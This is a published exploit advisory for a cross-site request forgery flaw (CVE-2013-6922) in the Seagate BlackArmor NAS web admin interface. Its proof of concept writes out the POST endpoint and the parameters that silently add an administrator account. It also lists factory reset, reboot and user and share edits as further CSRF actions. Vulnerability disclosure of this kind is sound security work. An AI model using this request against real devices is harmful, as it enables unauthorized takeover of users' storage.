Skip to content
cyberexploits
webapphardwaretext

Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery

Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery

Published on 2014-01-06

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/hardware/webapps/30726.txt7eac4c3a
raw
# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery



# Google Dork: N/A



# Date: 04-01-2014



# Exploit Author: Jeroen - IT Nerdbox



# Vendor Homepage: http://www.seagate.com/



# Software Link:

http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/



# Version: sg2000-2000.1331



# Tested on: N/A



# CVE : CVE-2013-6922



#



## Description:



#



# There are multiple CSRF attacks possible, the proof of concept shows how

it is possible to add



# a user with administrative privileges to the system.

#

# It is also possible to:



# 



# 1. Factory reset the device



# 2. Reboot the device



# 3. Add/Edit/Remove users

# 4. Add/Edit/Remove shares and volumes



#

# This vulnerability was reported to Seagate in September 2013, they stated

that this will not be fixed. 



#



## Proof of Concept:



# 



# POST: http(s)://<url |

ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23

# Parameters:



#



# username attacker

# adminright yes

# fullname hacker

# userpasswd attackers_password

# userpasswdcheck attackers_password

View on GitHub